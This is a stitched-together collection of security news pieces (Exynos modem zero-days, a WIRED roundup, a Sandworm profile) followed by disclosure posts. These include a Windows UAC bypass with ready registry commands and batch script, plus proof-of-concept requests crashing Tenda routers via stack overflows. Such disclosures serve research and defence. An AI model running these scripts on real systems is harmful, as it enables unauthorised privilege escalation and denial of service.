Users of affected devices that want to mitigate risk from the security issues in the Exynos chipsets can turn off Wi-Fi and Voice-over-LTE settings, researchers from Google's Project Zero say.

A newly disclosed set of vulnerabilities in Samsung chipsets has exposed millions of Android mobile phone users to potential remote code execution (RCE) attacks, until their individual device vendors make patches available for the flaws.

Until then, the best bet for users who want to protect against the threat is to turn off Wi-Fi calling and Voice-over-LTE settings on their devices, according to the researchers from Google's Project Zero who discovered the flaws.

In a blog post last week, the researchers said they had reported as many as 18 vulnerabilities to Samsung in the company's Exynos chipsets, used in multiple mobile phone models from Samsung, Vivo, and Google. Affected devices include Samsung Galaxy S22, M33, M13, M12, A71, and A53, Vivo S16, S15, S6, X70, X60, and X30, and Google's Pixel 6 and Pixel 7 series of devices.

**Android Users Face Complete Compromise**

Four of the vulnerabilities in the Samsung Exynos chipsets give attackers a way to completely compromise an affected device, with no user interaction needed and requiring the attacker to only know the victim's phone number, Project Zero threat researcher Tim Willis wrote.

"Tests conducted by Project Zero confirm that those four vulnerabilities \[CVE-2023-24033, CVE-2023-26496, CVE-2023-26497, and CVE-2023-26498\] allow an attacker to remotely compromise a phone at the baseband level," Willis said. "With limited additional research and development, we believe that skilled attackers would be able to quickly create an operational exploit to compromise affected devices silently and remotely." 

The security researcher identified the remaining 14 vulnerabilities in Samsung Exynos chipsets as being somewhat less severe.

In an emailed statement, Samsung said it had identified six of the vulnerabilities as potentially impacting some of its Galaxy devices. The company described the six flaws as not being "severe" and said it had released patches for five of them in a March security update. Samsung will release a patch for the sixth flaw in April. The company did not respond to a Dark Reading request seeking information on whether it will release patches for all 18 vulnerabilities that Google disclosed. It's also unclear whether, or when, all affected Samsung Galaxy devices will receive the updates.

Willis said affected Google Pixel devices had already received a fix for one of the disclosed flaws (CVE-2023-24033) with the company's March 2023 security update. Google did not immediately respond to a Dark Reading request for information on when patches would be available for the remaining vulnerabilities. Vivo did not respond immediately to a Dark Reading request either, so the company's plans for addressing the vulnerabilities remain unclear as well.

**The Android Patch Gap Problem**

In the past, device vendors have taken their time addressing vulnerabilities in the Android ecosystem. So, if that's any indication, users affected by the vulnerabilities in the Samsung chipset could be in for a long wait. 

In November, Project Zero researchers reported on what they described a significant patch gap resulting from the delay between when a firmware patch for an Android device becomes available and when a device vendor actually makes it available for their users. As an example, Project Zero researchers pointed to several vulnerabilities they discovered in the ARM Mali GPU driver. Google reported the vulnerabilities to ARM last June and July, after which the latter issued patches for the flaws in July and August. Yet more than three months later, in November, when Google tested affected devices for the vulnerability, the researchers found every single device still vulnerable to the issues.

"The easy part is fixing the hardware flaws with new software," says Ted Miracco, CEO at Approov. "The harder part is getting manufacturers to push the updates to the end users and getting end users to update their devices," he says. Unfortunately, many users of the chipsets may not be quick to patch the devices and users are probably largely unaware if the vulnerabilities, he says.

Vulnerabilities like the ones Project Zero discovered in the Samsung chipsets exist not only in the Android ecosystem, but in the iOS ecosystem and any complex supply chain involving sophisticated hardware and software as well, Miracco continues. The challenge is reducing the time from detecting flaws to deploying solutions on all devices. 

"This is an area where the Android ecosystem needs to put a lot attention, as updates can be few and far between with many manufacturers of mobile devices," he says. Enterprises could mandate that users who bring their own devices (BYOD) to work must utilize devices from approved suppliers that have a track record of rapidly deploying updates, Miracco adds.

Krishna Vishnubhotla, vice president of product strategy at Zimperium, says vulnerabilities like these highlight the need for enterprises to evaluate their mobile security strategies. "It makes sense for enterprises to guide their employees on how to stay safe and if there are new requirements for enterprise access," he notes.

With so much original equipment manufacturer (OEM) fragmentation in the Android space, the patches might only be available after a few months for all the vulnerabilities discovered. "This is why it's important for enterprises to invest in security that can handle zero-day threats and can be updated over the air," Vishnubhotta adds.

Unpatched Samsung Chipset Vulnerabilities Open Android Users to RCE Attacks

By Deeba Ahmed
In addition to Google Pixel and Samsung devices, Vivo devices were also vulnerable to this attack.
This is a post from HackRead.com Read the original post: Hackers can hijack Samsung and Pixel phones by knowing phone number

****The cybersecurity researchers at Google identified eighteen zero-day vulnerabilities, four of which allowed Hackers to remotely compromise smartphone devices using just the victim’s phone number.****

Google Pixel and Samsung phone owners should be cautious, as Google’s bug-hunting team, Project Zero, has discovered as many as 18 security vulnerabilities impacting Exynos modems.

Reportedly, these vulnerabilities, if combined, can allow an adversary to gain complete control over a smartphone without alerting the user. The devices vulnerable to these vulnerabilities include the following:

*   Google Pixel 6 and Pixel 7 series
*   Vivo S16, S15, S6, X70, X60, and X30 series
*   Samsung S22, M33, M13, M12, A71, A53, A33, A21, A13, A12, and A04 series.

In addition, wearable devices using the Exynos W20 chipset, such as Galaxy Watch 4 and 5, and vehicles using the Exynos Auto T5123 chipset are also vulnerable.

According to Project Zero head Tim Willis, these zero-day vulnerabilities were found in late 2022 and early 2023. Out of the 18 security flaws, four allow attackers to compromise the phone remotely using just the victim’s phone number.

In addition, skilled threat actors can create an operational exploit quickly to “silently and remotely” compromise impacted devices. These four flaws are the most crucial of all.

> Tests conducted by Project Zero confirm that those four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker knows the victim’s phone number.
> 
> Google Project Zero

One of the exploits has been assigned a CVE (Common Vulnerabilities and Exposures) number, CVE-2023-24033, and Google has withheld it, which is a rare instance considering its previous bug disclosures. In this flaw, the impacted baseband model chipsets don’t check the format types that the SDP module specifies, leading to a denial of service attack.

Hence, an attacker can remotely lock the phone and bar the user from using it. It was fixed in Google’s March 2023 security update and has already been implemented in Pixel 7 series phones. However, Pixel 6 series, including Pixel 6 Pro, and Pixel 6a, do not yet have it.

The other 14 vulnerabilities aren’t as critical. Some have been assigned CVEs, including CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, and CVE-2023-26076, while 9 are still awaiting CVEs.

It is worth noting that attackers would need a malicious mobile network operator or local access to the device to exploit them. Although it may sound impossible, a report from June 2022 shows that ISPs have been assisting malicious threat actors in installing malware on victim devices.

The good news, according to Google’s blog post, for Samsung Galaxy S22 owners in the US is that their phones don’t have a Samsung Exynos chipset but a Qualcomm chipset, so their devices aren’t vulnerable. However, European owners of the same phone are not as lucky. Therefore, those using unpatched devices must disable Wi-Fi Calling and VoLTE (voice over LTE).

1.  Hacking Honda and Nissan Cars by Knowing VIN number
2.  Hacking Facebook Account by Knowing its Phone Number
3.  New attack vector ReVoLTE lets hackers monitor phone calls
4.  Hacker finds Aussie PM’s passport number using his Instagram
5.  PlayStation serial number leads Feds to bust a massive drug ring

Hackers can hijack Samsung and Pixel phones by knowing phone number

Categories: News
Tags: android

Tags:  google

Tags:  samsung

Tags:  chip

Tags:  VoLTE

Tags:  modem

Tags:  chipset

Tags:  vulnerability

Tags:  pixel

Tags:  CVE-2023-24033

We take a look at multiple vulnerabilities highlighted by Google's Project Zero team, and what you can do to ward off the threat of attack.



(Read more...)




The post Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles appeared first on Malwarebytes Labs.

Google’s Project Zero is warning of multiple significant vulnerabilities found across many models of mobile devices including Samsung Galaxy, Google Pixel, Vivo, and several forms of wearable and vehicles using certain types of components.

Between late 2022 and early 2023, Project Zero reported 18 vulnerabilities in a chip powering those devices. Of those 18, a total of four vulnerabilities are tagged as “top-severity” which could allow for silent compromise over the network.

**Which devices are affected?**

The list of impacted technology is as follows:

*   Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series
*   Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series
*   The Pixel 6 and Pixel 7 series of devices from Google
*   Any vehicles that use the Exynos Auto T5123 chipset

The four most severe vulnerabilities could allow attackers to remotely compromise a device, with no physical interaction required at any stage of the proceedings. The only thing an attacker requires for the compromise to take place is knowledge of the intended victim’s phone number.

The other fourteen, while still bad, are nowhere near as severe, and for them to be successful requires either a malicious mobile network operator or an attacker with local access to the device.

Meanwhile, the Google Security research team believes that the most severe vulnerabilities would allow skilled attackers to create an operational exploit in a short space of time.

**Patching and scope of threat**

While Google mentions that patching will be dependent on manufacturer, PIxel phones (for example) have already been patched against CVE-2023-24033 in the March security update. If a patch isn’t forthcoming for your own device yet, Google has some suggestions to help keep your technology safe from harm. If your device allows you to, switch off two settings called:

*   Wi-Fi calling
*   Voice-over-LTE (VoLTE)

This will prevent the risk of exploitation. One potential ramification of disabling VoLTE is that in recent years it has become something of a necessity for some mobile networks. If you’re able to turn it off, then based on the information available you may experience poor call quality and lack of certain features and functionality. On the other hand, VoLTE is “not available everywhere on every network, or on every handset” so it may not matter too much anyway depending on your make and model.

As for scope, depending on where your device is from you may not be running the vulnerable type of chip needed for the exploit to be successful. The Verge notes that phones sold outside of Europe and some African countries” use something else altogether. In those instances, you should be fine.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles

Plus: A SpaceX supplier ransom, critical vulnerabilities in dozens of Android phones, and more.

What’s more controversial than a popular surveillance camera maker that has an uncomfortably cozy relationship with American police? When ransomware hackers claim to have breached that company—Amazon-owned camera maker Ring—stolen its data, and Ring responds by denying the breach.

But we’ll get to that.

Five years ago, police in the Netherlands caught members of Russia’s GRU military intelligence red-handed as they tried to hack the Organization for the Prohibition of Chemical Weapons in The Hague. The team had parked a rental car outside the organization’s building and hid a Wi-Fi snooping antenna in its trunk. Within the GRU group was Evgenii Serebriakov, who was caught with further Wi-Fi hacking tools in his backpack.

Since then, surprisingly, Serebriakov has only risen in status. This week, Western intelligence sources told WIRED that Serebriakov is now the new leader of one of the world’s most aggressive hacking units. Serebriakov took over Sandworm, which is responsible for some of the worst cyberattacks in history, in the spring of 2022. His elevation to the senior role, experts say, shows how small the pool of skilled nation-state hackers is likely to be and demonstrates Serebriakov’s value to Russia.

Nowhere on the internet is free from threats—and that includes LinkedIn. This week we looked at how spies, scammers, and hackers from Iran, North Korea, Russia, and China are using the professional network to scout and approach intelligence targets. In addition, LinkedIn is plagued with thousands of suspicious accounts; it removed hundreds from WIRED’s profile when we reported them.

The Western clampdown on TikTok is continuing—this week the UK joined the US, Belgium, Canada, and the European Union in banning the social media app from being used on government devices. But in the US, Senator Mark Warner is trying to pass legislation, in the guise of the bipartisan Restrict Act, that will allow officials to ban apps and services from six “hostile” nations: China, Russia, North Korea, Iran, Cuba, and Venezuela. We sat down with Warner and asked about the plans.

A WIRED analysis of “cybercrime” cases across the US shows how vague and wide-ranging the term can be. Without a clear and universal definition of cybercrime, human rights and civil liberties issues may expand globally. Speaking of criminals, scammers are getting better at using voice deepfakes to con people. And ransomware gangs are sinking to a new deplorable low. As more and more companies and organizations refuse to pay ransoms, criminal gangs are increasingly using extortion as leverage: they are now releasing photos stolen from cancer patients and sensitive student records. 

But wait, there's more. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

ALPHV, a prolific group of hackers who extort companies with ransomware and leak their stolen data, said earlier this week that it had breached security camera maker Ring and threatened to dump the company’s data online if it doesn’t pay. “There’s always an option to let us leak your data …” the hackers wrote in a message to Ring on their leak site. Ring has so far responded with a denial, telling Vice’s Motherboard, “We currently have no indications of a ransomware event,” but it says it’s aware of a third-party vendor that has experienced one. That vendor, Ring says, doesn’t have access to any customer records. 

Meanwhile, ALPHV, which has previously used its BlackCat ransomware to target companies like Bandai Namco, Swissport, and hospital firm Lehigh Valley Health Network, stands by its claim to have breached Ring itself, not a third-party vendor. A member of the malware research group VX-Underground shared with WIRED screenshots of a conversation with an ALPHV representative who says that it’s still in “negotiations” with Ring.

Amid the ongoing ransomware epidemic, it’s no surprise that Ring isn’t alone in facing extortion problems. So too is Maximum Industries, a supplier of rocket parts for Elon Musk’s SpaceX. The hackers, a well-known ransomware gang known as LockBit, taunted Musk on their website, threatening to sell the stolen information to the highest bidder if Maximum doesn’t pay by their March 20 deadline. “I would say we were lucky if Space-X contractors were more talkative. But I think this material will find its buyer as soon as possible,” the hackers wrote. “Elon Musk we will help you sell your drawings to other manufacturers.”

Google’s Project Zero, its security research team devoted to finding unknown vulnerabilities in widely used tech products, warned Thursday that it had discovered severe hackable flaws in Samsung chips used in dozens of Android devices. In total, the researchers found 18 distinct vulnerabilities in Samsung’s Exynos modems for smartphones, but they say that four of them are particularly critical and would allow a hacker to “remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim’s phone number.” Project Zero only rarely publishes information on unpatched vulnerabilities. But it says that it gave Samsung 90 days to fix the flaws, and it hasn’t yet. A bit of public shaming, perhaps, might spur Samsung to move faster to protect Google’s users from an insidious form of attack.

Since 2017, the cryptocurrency “mixer” service ChipMixer quietly grew into a powerhouse of cryptocurrency money laundering, taking in users’ coins, mixing them with others and then sending them back to obscure the money’s trail across blockchains. In the process, the Department of Justice says it laundered $3 billion worth of criminal funds, including ransomware payments, North Korean hackers’ stolen loot, and even profits from the sale of child sexual exploitation materials. Now, in a bust carried out by multiple European law enforcement agencies and coordinated by Europol as well as the FBI and DHS, ChipMixer has been taken offline and its infrastructure seized. The site’s alleged creator, 49-year-old Vietnamese national Minh Quốc Nguyễn, remains out of reach: He’s been charged with money laundering only in absentia. 

But the most intriguing result of the case may have more to do with the meltdown of the now notorious cryptocurrency exchange FTX: A portion of FTX’s funds that were stolen in the midst of its bankruptcy proceedings in November were funneled into ChipMixer. Seizing the servers of that mixing service may well foil the FTX thieves’ attempt to evade tracing and help solve one of the central mysteries of that high-profile heist.

Only in the cryptocurrency world, where thefts of more than half a billion dollars now occur multiple times a year, does the stealing of $200 million merit the lowest spot on a news roundup. Early this week, the distributed trading protocol Euler Finance lost nearly $200 million in cryptocurrency to hackers who found a vulnerability in its code. At first, Euler, the company behind that protocol, offered to let the hackers keep $20 million if they returned the rest of the funds. But after that offer was ignored—in fact, the hackers have sent the funds to the Tornado Cash mixing service in the hopes of covering their tracks—the firm has announced a $1 million bounty on the hackers’ heads.

Security News This Week: Ring Is in a Standoff With Hackers

This write up is an overview of how Microsoft's attempts to manage elevated access to executables via registry entries has added over complexity that still allows for escalation.

    Hi @ll,with Windows 2000, Microsoft virtualised the [HKEY_CLASSES_ROOT] registrybranch: what was just an alias for [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]before became the overlay of [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] and[HKEY_CURRENT_USER\Software\Classes] with the latter having precedence:<https://msdn.microsoft.com/en-us/library/ms724498.aspx>Note: while [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] is writable only by      (privileged) administrators, [HKEY_CURRENT_USER\Software\Classes]      is writable by the (current) unprivileged user.With Windows Vista they introduced the "security theatre" called"User Account Control" (a far better name is "qUACkery"):<https://blogs.msdn.microsoft.com/uac/2005/12/08/user-account-control/>| User Account Protection was the preliminary name for a core security| component of Windows Vista. The component has now been officially named| User Account Control (UAC).The qUACkery sort of lobotomises administrator accounts and splits theirbrain^Waccess token: the "shell", i.e. EXPLORER.exe, and all programs runfrom it use a restricted access token without administrative privileges.For the (not so few) programs which but need administrative privileges,Microsoft introduced a "kill switch" in the application manifest:<https://msdn.microsoft.com/en-us/library/aa374191.aspx><https://msdn.microsoft.com/en-us/library/bb756929.aspx>| <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">|    <security>|       <requestedPrivileges>|          <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />|       </requestedPrivileges>|    </security>| </trustInfo>With this loop^Wwormhole, the virtualised [HKEY_CLASSES_ROOT] introducedwith Windows 2000 became but a can of worms: in STANDARD installations ofWindows, applications running with administrative privileges, i.e. anintegrity level above "Medium", now evaluate registry settings (COM CLSIDs,ProgIDs, URL protocols, ...) which are under control of the unprivilegeduser.<https://msdn.microsoft.com/en-us/library/ms724498.aspx>| If an application is run with administrator rights and User Account| Control is disabled, the COM runtime ignores per-user COM configuration| and accesses only per-machine COM configuration.<https://msdn.microsoft.com/en-us/library/bb756926.aspx>| Beginning with Windows Vista® and Windows Server® 2008, if the| integrity level of a process is higher than Medium, the COM runtime| ignores per-user COM configuration and accesses only per-machine| COM configuration. This action reduces the surface area for elevation| of privilege attacks, preventing a process with standard user privileges| from configuring a COM object with arbitrary code and having this code| called from an elevated process.OOPS: COM CLSIDs have been removed from the can of worms.But what about ProgIDs and URL protocols?<https://msdn.microsoft.com/en-us/library/cc144152.aspx>Demonstration:~~~~~~~~~~~~~~1) Start the command processor in the user account created during   Windows setup;2) Execute the "Feature on Demand" helper application FoDHelper.exe   (which requires administrative privileges, but elevates SILENTLY),   then close the "Immersive Control Panel" window it opened;3) Add the following registry entries to replace the application run   by the elevated FoDHelper.exe from "Immersive Control Panel" to   "Windows Command Processor" (or an arbitrary other one):   [HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command]   @="C:\\Windows\\System32\\Cmd.exe"   [HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer]   @="qUACkery"4) Execute FoDHelper.exe again;5) Remove the registry entries created in step 3.If you prefer a batch script:--- quackery.cmdREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command" /VE /T REG_SZ /D "%COMSPEC%" /FREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer" /VE /T REG_SZ /D "qUACkery" /FFoDHelper.exeREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\MS-Settings" /FREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\qUACkery" /F--- EOF ---OOPS: Windows Defender blocks the execution of FoDHelper.exeSpoiler: installation of another anti-virus, for example McAfee,         Bitdefender, Eset, Sophos, Avira, AVG/Avast, TrendMicro,         deactivates Windows Defender and lets FoDHelper.com run         an arbitrary application elevated, without UAC prompt.stay tuned, and far away from the eternally vulnerable crap oozing out of RedmondStefan KanthakPS: finding the applications which call the ProgIDs/URL protocols    ms-settings-airplanemode, ms-settings-bluetooth, ms-settings-cellular,    ms-settings-connectabledevices, ms-settings-displays-topology,    ms-settings-emailandaccounts, ms-settings-language, ms-settings-location,    ms-settings-lock, ms-settings-mobilehotspot, ms-settings-notifications,    ms-settings-power, ms-settings-privacy, ms-settings-proximity,    ms-settings-screenrotation, ms-settings-wifi, ms-settings-workplace    is left as an exercise to the reader.PPS: for all these URL protocols, the wise guys from Redmond added the     following registry entries to ease their exploitation:     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings]     "WarnOnOpen"=dword:00000000     ...     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings-workplace]     "WarnOnOpen"=dword:00000000

Microsoft User Account Control Nuances

Google is calling attention to a set of severe security flaws in Samsung's Exynos chips, some of which could be exploited remotely to completely compromise a phone without requiring any user interaction.
The 18 zero-day vulnerabilities affect a wide range of Android smartphones from Samsung, Vivo, Google, wearables using the Exynos W920 chipset, and vehicles equipped with the Exynos Auto T5123

Mobile Security / Firmware

Google is calling attention to a set of severe security flaws in Samsung's Exynos chips, some of which could be exploited remotely to completely compromise a phone without requiring any user interaction.

The 18 zero-day vulnerabilities affect a wide range of Android smartphones from Samsung, Vivo, Google, wearables using the Exynos W920 chipset, and vehicles equipped with the Exynos Auto T5123 chipset.

Four of the 18 flaws make it possible for a threat actor to achieve internet-to-baseband remote code execution, Google Project Zero, which reported the issues in late 2022 and early 2023, said.

"\[The\] four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number," Tim Willis, head of Google Project Zero, said.

In doing so, a threat actor could gain entrenched access to cellular information passing in and out of the targeted device. Additional details about the bugs have been withheld.

The attacks might sound prohibitive to execute, but, to the contrary, they are well within reach of skilled attackers, who can quickly devise an operational exploit to breach affected devices "silently and remotely."

The remaining 14 flaws are said to be not as severe, as it necessitates a rogue mobile network insider or an attacker with local access to the device.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

While Pixel 6 and 7 handsets have already received a fix as part of March 2023 security updates, patches for other devices are expected to vary depending on the manufacturer's timeline.

Until then, users are recommended to switch off Wi-Fi calling and Voice over LTE (VoLTE) in their device settings to "remove the exploitation risk of these vulnerabilities."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Uncovers 18 Severe Security Vulnerabilities in Samsung Exynos Chips

Any request send to a Netgear Nighthawk Wifi6 Router (RAX30)'s web service containing a “Content-Type” of “multipartboundary=” will result in the request body being written to “/tmp/mulipartFile” on the device itself. A sufficiently large file will cause device resources to be exhausted, resulting in the device becoming unusable until it is rebooted.

tenable.cloudflareaccess.com

drupal9.tenable.com

Sign in with:

Okta ・ okta

CVE-2023-28338: Sign in ・ Cloudflare Access

Evgenii Serebriakov now runs the most aggressive hacking team of Russia’s GRU military spy agency. To Western intelligence, he’s a familiar face.

For years, the hacking unit within Russia's GRU military intelligence agency known as Sandworm has carried out some of the worst cyberattacks in history—blackouts, fake ransomware, data-destroying worms—from behind a carefully maintained veil of anonymity. But after half a decade of the spy agency's botched operations, blown cover stories, and international indictments, perhaps it's no surprise that pulling the mask off the man leading that highly destructive hacking group today reveals a familiar face.

The passport Evgenii Serebriakov used to enter the Netherlands in 2018.

Photograph: Department of Justice

The commander of Sandworm, the notorious division of the agency's hacking forces responsible for many of the GRU's most aggressive campaigns of cyberwar and sabotage, is now an official named Evgenii Serebriakov, according to sources from a Western intelligence service who spoke to WIRED on the condition of anonymity. If that name rings a bell, it may be because Serebriakov was indicted, along with six other GRU agents, after being caught in the midst of a close-range cyberespionage operation in the Netherlands in 2018 that targeted the Organization for the Prohibition of Chemical Weapons in the Hague.

In that foiled operation, Dutch law enforcement didn't just identify and arrest Serebriakov and his team, who were part of a different GRU unit generally known as Fancy Bear or APT28. They also seized Serebriakov’s backpack full of technical equipment, as well as his laptop and other hacking devices in his team’s rental car. As a result, Dutch and US investigators were able to piece together Serebriakov's travels and past operations stretching back years and, given his newer role, now know in unusual detail the career history of a rising GRU official.

According to the intelligence service sources, Serebriakov was placed in charge of Sandworm in the spring of 2022 after serving as deputy commander of APT28, and now holds the rank of colonel. Christo Grozev, the lead Russia-focused investigator for open source intelligence outlet Bellingcat, has also noted Serebriakov's rise: Around 2020, Grozev says, Serebriakov began receiving phone calls from GRU generals who, in the agency's strict hierarchy, only speak to higher-level officials. Grozev, who says he bought the phone data from a Russian black market source, says he also saw the GRU agent's number appear in the phone records of another powerful military unit focused on counterintelligence. "I realized he must be in a command position," says Grozev. "He can't just be a regular hacker anymore."

The fact that Serebriakov appears to have attained that position despite having been previously identified and indicted in the failed Netherlands operation suggests that he must have significant value to the GRU—that he's “apparently too good to dump,” Grozev adds.

Serebriakov's new position leading Sandworm—officially GRU Unit 74455 but also known by the nicknames Voodoo Bear and Iridium—puts him in charge of a group of hackers who are perhaps the world's most prolific practitioners of cyberwar. (They've also dabbled in espionage and disinformation campaigns.) Since 2015, Sandworm has led the Russian government's unprecedented campaign of cyberattacks on Ukraine: It penetrated electric utilities in western Ukraine and Kyiv to cause the first- and second-ever blackouts triggered by hackers and targeted Ukrainian government agencies, banks, and media with countless data-destructive malware operations. In 2017, Sandworm released NotPetya, a piece of self-replicating code that spread to networks worldwide and inflicted a record $10 billion in damage. Sandworm then went on to sabotage the 2018 Winter Olympics in Korea and attack TV broadcasters in the nation of Georgia in 2019, a shocking record of reckless hacking.

With Russia's full-scale invasion of Ukraine a year ago, the GRU's most aggressive hacking unit, now under Serebriakov's leadership, has refocused its efforts on that country. From its headquarters in a tower in the Moscow suburb of Khimki, it has launched new volleys of data-destroying malware, attempted to cause a third blackout—which the Ukrainian government says it prevented—and bombarded Ukrainian and Polish organizations with a fake ransomware campaign known as Prestige.

Serebriakov's pre-Sandworm hacking career was no less brazen. When he was captured along with the six other GRU agents in the Netherlands in 2018, US prosecutors say, he had in his backpack a Wi-Fi Pineapple, a book-sized device designed to spoof Wi-Fi networks and trick victims into connecting to it instead of the intended Wi-Fi hot spot, then carry out man-in-the-middle attacks that intercept or alter the victim's traffic. Serebriakov's team had also parked a rented car outside the Organization for the Prohibition of Chemical Weapons building with an antenna for Wi-Fi hacking hidden in the trunk. The team was likely targeting staffers of the OPCW who were investigating Russia's use of the Novichok nerve agent in the GRU's attempted assassination of defector Sergei Skripal.

Serebriakov posing with a Russian athlete at the Summer Olympics in Rio de Janeiro in 2016.

Photograph: Department of Justice

When investigators examined that confiscated Wi-Fi hacking equipment, they found evidence of a long list of Wi-Fi networks it had connected to previously, essentially mapping out the travels of Serebriakov and his colleagues to carry out previous hacking operations. The hackers, it seemed, had targeted officials at the 2016 Summer Olympics in Rio de Janeiro, from which more than 100 Russian athletes had been banned for performance-enhancing drug use, as well as attendees of a conference in Lausanne, Switzerland, focused on anti-doping efforts in athletics.

Exactly why Dutch authorities released Serebriakov and his fellow spies rather than criminally charge them—or extradite them to the US, where they face an indictment for hacking crimes—has never been explained, and the Dutch MIVD defense intelligence service didn't respond to WIRED's questions about it at the time.

That the figure at the helm of Sandworm today is someone previously identified in that very publicly blown Netherlands operation may demonstrate Serebriakov's value to the GRU: According to the intelligence service sources, he's regarded as having good connections to the security research community and strong technical skills. As for the fiasco of the GRU's Netherlands mission, the intelligence sources say that was blamed on the agents escorting him and his APT28 colleagues, not the hackers themselves. And in some cases, for the GRU, an indictment only bolsters an agent's reputation for boldness and risk-taking. “For the Kremlin, it may be ‘great, you’ve made a splash, built the myth, bolstered our reputation as these techno-raiders, good on you,’” says Gavin Wilde, a former official at the US National Security Agency and the White House National Security Council who now serves as a fellow at the Carnegie Endowment for International Peace.

But Serebriakov's reappearance also indicates that relatively few people serve as key players in high-profile state-sponsored hacking operations, says John Hultquist, the head of threat intelligence at cybersecurity firm Mandiant. Hultquist was part of the group of researchers who initially discovered and named Sandworm, and he has closely tracked the unit for years. “This is someone from a notorious close-access operation, and then he shows up as the leader of another organization we know very well,” says Hultquist, using the term _close-access_ to refer to Serebriakov's short-range Wi-Fi hacking tactics in the Netherlands. “To a certain extent, it demonstrates how small this world is that we’re trying to keep tabs on.”

“The same individuals show up again and again—and I mean the people with the actual hands on the keyboard,” Hultquist adds. “It speaks to the limited number of people in the field. We're still living in a world where talent is apparently limited to the point where we know the adversaries intimately.”

This Is the New Leader of Russia's Infamous Sandworm Hacking Unit

Tenda AX3 V16.03.12.11 was discovered to contain a stack overflow via the shareSpeed parameter at /goform/WifiGuestSet.

Permalink

**Tenda AX3 V16.03.12.11 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-3476.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiGuestSet，The user passes in shareSpeed, and then the program will use strcpy to copy shareSpeed to shared\_up\_speed. It is worth noting that there is no size check, which leads to stack overflow vulnerabilities.

**Poc**

import requests

url \= "http://192.168.0.1/goform/WifiGuestSet"

shareSpeed \= "a" \* 0x2000

r \= requests.post(url, data\={'shareSpeed': shareSpeed})
print(r.content)

You can see the router crash, and finally you can write exp to get root shell

CVE-2023-27239: CVE/readme.md at main · yjzy00001/CVE

Tenda V15V1.0 V15.11.0.14(1521_3190_1058) was discovered to contain a buffer overflow vulnerability via the picName parameter in the formDelWewifiPi function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

Permalink

Cannot retrieve contributors at this time

**Tenda V15V1.0 found a buffer overflow vulnerability in the "formDelWewifiPic" function****Vendor:**

​ Tenda

**Product:**

​ V15EV1.0

**Vendor Homepage:**

​ https://www.tenda.com.cn/

**Firmware:**

​ https://www.tenda.com.cn/download/detail-2722.html

**Version:**

​ V15.11.0.14(1521\_3190\_1058)

**Vulnerability details**

The vulnerability is in the "formDelWewifiPic" function in the /bin/httpd file

​ 

"picName" receives the transmitted parameters, does not verify its length. causes a buffer overflow vulnerability due to the use of sprintf()

**POC**

POST /goform/delWewifiPic HTTP/1.1
Host: 192.168.75.201
Content-Length: 250
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.75.201
Referer: http://192.168.75.201/quickset/quickset.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: W15E\_user=
Connection: close

